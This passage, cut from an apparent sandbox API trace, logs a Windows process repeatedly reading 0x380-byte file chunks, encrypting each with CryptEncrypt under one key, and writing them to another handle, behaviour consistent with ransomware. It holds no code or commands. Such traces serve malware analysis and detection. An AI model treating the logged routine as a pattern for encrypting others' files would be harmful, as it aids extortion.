lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.103] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.103] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.103] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.103] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.103] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.103] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.103] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.103] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.103] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.104] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.104] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.104] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.104] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.104] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.104] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.104] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.104] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.104] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.105] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.105] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.105] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.105] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.105] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.105] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.105] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.105] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.105] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.105] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.106] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.106] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.106] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.106] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.106] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.106] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.106] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.106] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.106] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.107] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.107] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.107] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.107] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.107] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.107] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.107] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.107] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.107] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.107] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.108] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.108] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.108] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.108] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.108] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.108] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.108] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.108] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.108] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.108] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.108] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.108] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.108] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.109] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.109] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.109] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.109] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.109] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.109] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.109] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.109] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.109] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.109] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.109] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.109] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.109] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.109] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.109] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.110] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.110] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 